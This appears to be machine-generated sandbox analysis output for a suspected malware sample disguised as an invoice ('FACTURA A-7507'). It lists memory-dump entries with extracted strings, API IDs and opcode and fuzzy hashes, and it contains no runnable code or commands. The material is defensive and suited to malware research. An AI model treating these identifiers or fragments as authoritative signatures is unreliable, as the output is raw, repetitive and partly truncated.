                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                          • Opcode ID: 40092c7d15b96312cfddb75505ef32c7ece128b22e560e06cef42fd4913e6592
                                                                                                                                                                                                                          • Instruction ID: 61903b723cf29304bd7ad4d6c72f1cce53b2f3a82f057de13a5874e156b7c042
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40092c7d15b96312cfddb75505ef32c7ece128b22e560e06cef42fd4913e6592
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6325974E05369DFEB2ACF64C846BD9BBB1BF08304F0040E9D449A7261DBB49A95CF90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: ${M5
                                                                                                                                                                                                                          • API String ID: 0-1177445209
                                                                                                                                                                                                                          • Opcode ID: ca56b28df818a8c8f5f13ce6a78d2a44b9b359b1c99c6256ef9e03c04c90fc8a
                                                                                                                                                                                                                          • Instruction ID: e6958d08b9ddb55af5698457c45534a9c46078eb8da54f3cf37c42bc4c1d8bc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca56b28df818a8c8f5f13ce6a78d2a44b9b359b1c99c6256ef9e03c04c90fc8a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9B18A716093019FD718CF28C890A6BFBF5BF84754F504A6EF9949B2A6D730D904CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0$Flst
                                                                                                                                                                                                                          • API String ID: 0-758220159
                                                                                                                                                                                                                          • Opcode ID: f71684e7b6c08cf9921fd4548bc776a3fc11c494950502b0b0adfab046893f0d
                                                                                                                                                                                                                          • Instruction ID: 4734e0bc80d55efeb541ec246253704797a122e947f62bc1ebd8efd18aebfd7c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f71684e7b6c08cf9921fd4548bc776a3fc11c494950502b0b0adfab046893f0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F518CB6A007488FEB19CF99E494B99FBF5FF44758F1580AED0459B340EBB09981CB80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35430586
                                                                                                                                                                                                                          • kLsE, xrefs: 354305FE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                          • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                          • Opcode ID: fdcb384088c902403c79e10185c8a44057f02011911612e71876d1752ffbb14b
                                                                                                                                                                                                                          • Instruction ID: 2ba507ecdf69f2bee550425f9da74cdd4239d2c0c7bcfb6a6d17ed08c154ceb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcb384088c902403c79e10185c8a44057f02011911612e71876d1752ffbb14b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E51C0B5A02745DFEB18DFA5C4416AAB7F4BF48300F00867ED5DA83260EB70A515CB62
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: 0$0
                                                                                                                                                                                                                          • API String ID: 3446177414-203156872
                                                                                                                                                                                                                          • Opcode ID: 52a4560445d19c79f9600df659bd1db5b9d5c1cb0b3ac983169731219c1c9b81
                                                                                                                                                                                                                          • Instruction ID: 555c9e58bb9c5f0718e6b0dbac234bdf825bca701c7e98af124446f35d3b568a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52a4560445d19c79f9600df659bd1db5b9d5c1cb0b3ac983169731219c1c9b81
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 314179B16087529FD304CF28C484A5ABBE5BF88354F014A6EF888DB300D771EA06CB86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: ^B5
                                                                                                                                                                                                                          • API String ID: 3446177414-833176065
                                                                                                                                                                                                                          • Opcode ID: 41162716ceff7e7e86e7795ed11d2a41cd9a1c6a3d83b82af9434bc098623de5
                                                                                                                                                                                                                          • Instruction ID: 8e39f219157051898ca59ea588da1a5d0c2b8140583c8031a13a2f05c7851f83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41162716ceff7e7e86e7795ed11d2a41cd9a1c6a3d83b82af9434bc098623de5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E4172B9A04311DFD719CF1AC4849657BF6FF99750B5080AAEC09CB360DB71E8A1CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ZKP, xrefs: 354CAAD1
                                                                                                                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 354CAABF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$ZKP
                                                                                                                                                                                                                          • API String ID: 3446177414-1741731416
                                                                                                                                                                                                                          • Opcode ID: 3e0b8a0338bb0079abee6e87abeb9c0f53e01d13c0cfa2565b4267d9602041c5
                                                                                                                                                                                                                          • Instruction ID: 5973fbc8aba28fe7918be5d046ad30f8fec75c291566c64977e43d1d843c07e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e0b8a0338bb0079abee6e87abeb9c0f53e01d13c0cfa2565b4267d9602041c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A3139B6A00608EFD709CF55CD44F5AB7B6FB84B10F1186A9FA05A7780DB35A941CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: B5$mB5
                                                                                                                                                                                                                          • API String ID: 3446177414-894363284
                                                                                                                                                                                                                          • Opcode ID: 9d95abd364848063cfcb9bee06f0c33a8892051bab550f16eae153a6a0080aa9
                                                                                                                                                                                                                          • Instruction ID: ca359f34ee775bdfe72a0987ba9b500469b120ba37a22521618d2e1630e8297a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d95abd364848063cfcb9bee06f0c33a8892051bab550f16eae153a6a0080aa9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11C3B6A01218AFDF15CF98D985ADEBBB9FF4C360F10401AF911B7240D735AA54CBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6065e56e41eda0dfed6923fcdce289a30135a95ff3bdd7565fe76e1b9cf0abac
                                                                                                                                                                                                                          • Instruction ID: b31ebeee33e1b3f385bb0c47511dfb81ffff66b303153c830c20787226a4b68c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6065e56e41eda0dfed6923fcdce289a30135a95ff3bdd7565fe76e1b9cf0abac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F231B251A587F14ED30E836D08B9675AFC18F5620174EC2EEDADA6F2E3C4898408D3A5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 2$ ]$"$#N$#}$&$.$.$2%$7$88$:$=&$>$>$>Z$A$C2$F$F$G!$I$M$O$P>$Q$W$X$Z$[>C2$[Y$]$`$d$e$g$j$kX$l}$nT$r$t$w$w$y7$|Y$|b
                                                                                                                                                                                                                          • API String ID: 0-3453730861
                                                                                                                                                                                                                          • Opcode ID: 38700b62496774b92eb2fa8c054e8321830108fe542d8aa111838201b81f4108
                                                                                                                                                                                                                          • Instruction ID: 3a17682615e98a944e9d31285fc7060e0c3bbfdfb2af3ee1a076e1480e5da5a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38700b62496774b92eb2fa8c054e8321830108fe542d8aa111838201b81f4108
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F528EB0D05229CBEB25CF44C9987DDBBB2BB59308F1081DAD5497B281D7BA5AC5CF40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 6$O$S$\$s
                                                                                                                                                                                                                          • API String ID: 0-3854637164
                                                                                                                                                                                                                          • Opcode ID: 629d9f8fd33bb69b0c774539424d6b70700ef3ec872140cc26d158b4eaa0fb54
                                                                                                                                                                                                                          • Instruction ID: 6d199cfa4c3878f99fde53e83455e03479e695c0a82189672f6547baad412969
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 629d9f8fd33bb69b0c774539424d6b70700ef3ec872140cc26d158b4eaa0fb54
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251A272D00218ABDB10DF94DD89FFFB378EF84715F04469AED085A240E7759A49CBA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: <m
                                                                                                                                                                                                                          • API String ID: 0-19494629
                                                                                                                                                                                                                          • Opcode ID: d132b4ac03b3e70b966593de33dfeb9153f95c04e987523b35312d9d04a59c62
                                                                                                                                                                                                                          • Instruction ID: 408086c154e5c79856a87595461dd7b6ba76ee02a650fb5a077da6b4a696644e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d132b4ac03b3e70b966593de33dfeb9153f95c04e987523b35312d9d04a59c62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21EFB6D01219AF8B00DFE9D9419EFBBF9EF88200F14455AE915E7200E7715A158BA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: u
                                                                                                                                                                                                                          • API String ID: 0-687849348
                                                                                                                                                                                                                          • Opcode ID: 643a45dde549b4ad32c671eff09b46b2aab16d6881b5a26edab07ee2d7bd067e
                                                                                                                                                                                                                          • Instruction ID: b060eadca53612ae4bb7aa21abb9a138882cd0a7be504193b81e1596f3df1f9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 643a45dde549b4ad32c671eff09b46b2aab16d6881b5a26edab07ee2d7bd067e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401D7B6C01218AE9B40DFE8D9419EEBBF8AB58200F14466AE909F7241F77496048BA1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: J
                                                                                                                                                                                                                          • API String ID: 0-1141589763
                                                                                                                                                                                                                          • Opcode ID: 6b10ce7546597f2e82660433646f31035c52a4f16f8ac06a6cef5c439612204c
                                                                                                                                                                                                                          • Instruction ID: 71ee73d3ead52fff06d7b534848cb5dd2e80a2c3a66d4523dfcd1fba8032b0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b10ce7546597f2e82660433646f31035c52a4f16f8ac06a6cef5c439612204c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F02473A10216ABDB10DE6EEC84F86F79CEB85334F140123FD598B242E635E42183E0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9f09f84a966aee5cb7dfff1d96ad5016a2632335078495d35da87a97c62def58
                                                                                                                                                                                                                          • Instruction ID: 53a2a6bddeee5e88f4a0fdeb19a169b5b22630af632b7019351cc1ee8fe375c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f09f84a966aee5cb7dfff1d96ad5016a2632335078495d35da87a97c62def58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF412AB1D11218AFDB10CF99DD81AEEBBB8EB49710F10455BFA08E6240E3B596418BA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 98900f422ab1b1c0a3f9269a0104fc372052d1fa3f2b346cdf74d1b050d2426f
                                                                                                                                                                                                                          • Instruction ID: c1dbb2a3e17afca40e43ab9ddb3dbd36bb8560b204cf0db95e1a4a64eb9f2ec3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98900f422ab1b1c0a3f9269a0104fc372052d1fa3f2b346cdf74d1b050d2426f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6031E7B5A00608AFDB14DF99DD81EEFB7B9EF88300F10811AF958A7340D774A9518FA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 372eb60aec5c61252437f3a56cbeddd9c3afaea098818b5db842c2d8d74c27a7
                                                                                                                                                                                                                          • Instruction ID: 00585fc3c2374bf15e4fa6749aff50648e88d12ad09aa14230c6e667dd73183e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 372eb60aec5c61252437f3a56cbeddd9c3afaea098818b5db842c2d8d74c27a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7212FB5900609AFDB14DF98CC81EEF77B9EF88710F00810AF958A7340D770A951CBA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f4b6065b079dbb24a236c54b8e237d17072514aee8bbf0093730d31175c14bdb
                                                                                                                                                                                                                          • Instruction ID: 3498117ce8dac56ce06e8b0b7dc6d7e0ec0c4e75a24ef45eb8ea0868e5b2a0dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4b6065b079dbb24a236c54b8e237d17072514aee8bbf0093730d31175c14bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A1173B67803057AF720DE558C83FAB775C9B85B50F24401AFB08AE2C0D6A9F81247B4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 980f693d57bdf76ded1e6c69fc7c99d4c24715614439a999ebbbd2dc51e9987a
                                                                                                                                                                                                                          • Instruction ID: 5b5d0e6c2a9904f71fad30b6aa9ea10c45e0a3f367e3542e2a90ee277763fcc7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 980f693d57bdf76ded1e6c69fc7c99d4c24715614439a999ebbbd2dc51e9987a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D112E75A00708AFEB14EFA4CC45FEF77ACEF84700F00854AFA58AB241D7B569118BA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f5e57c0ced3b44d9efe8b1b1984538e2d79d8770a80c75fccdeb9f99f0e89a9d
                                                                                                                                                                                                                          • Instruction ID: f672189e4095ccb4988eff2a74de7d385cfc63821146cf227bbf52b06bc2ed8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5e57c0ced3b44d9efe8b1b1984538e2d79d8770a80c75fccdeb9f99f0e89a9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C114C75A00314AEEB14EF64CC45FEF77ACEF89700F00855AF958AA280D6B569118BA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 50010a244eb86075cc82e41a2f42d6916711dab5d9fddbff12f3a0ec74894380
                                                                                                                                                                                                                          • Instruction ID: d56482aabe5ef591e09ef8a4738ec1feea3a2b55bb83d360699b6317b22281ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50010a244eb86075cc82e41a2f42d6916711dab5d9fddbff12f3a0ec74894380
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B1112B6D0121CAF8B00DFA9DD419EEBBF9EF48200F04456EE919E7300E7749A058BE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 066ef8d11e9dc9d1f8df74a53e04dcdab159d2a41caf14fa70123ffb82f695bd
                                                                                                                                                                                                                          • Instruction ID: ef716f3444ca23e33f43db1b4c8c148e2ae034052e89f438f66205371adc8407
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 066ef8d11e9dc9d1f8df74a53e04dcdab159d2a41caf14fa70123ffb82f695bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01C4B6210608BBCB04DE89DC80EEB77ADAF8C714F408109BA09E7240D630F8518BA4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a7379eb4c18017b3aaf0a5b5600ef183688152f55a97917d98056af2dcb18dda
                                                                                                                                                                                                                          • Instruction ID: fe358429f433c44d031894d0dd44d9ac9820df6fa93cbe1ae1c937b1951ea40c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7379eb4c18017b3aaf0a5b5600ef183688152f55a97917d98056af2dcb18dda
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF01C76200604BFD710EF99DC85EDB77ADEFC8710F00451ABD1897241D670B9118BB0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9356ee26be0372dc47666724855f988e3dc47d8242a9501fbc4810957e0e7d4e
                                                                                                                                                                                                                          • Instruction ID: a862e1334fad16df790d1dc13092386025413ed4876357e7b2a5646d03e8fc96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9356ee26be0372dc47666724855f988e3dc47d8242a9501fbc4810957e0e7d4e
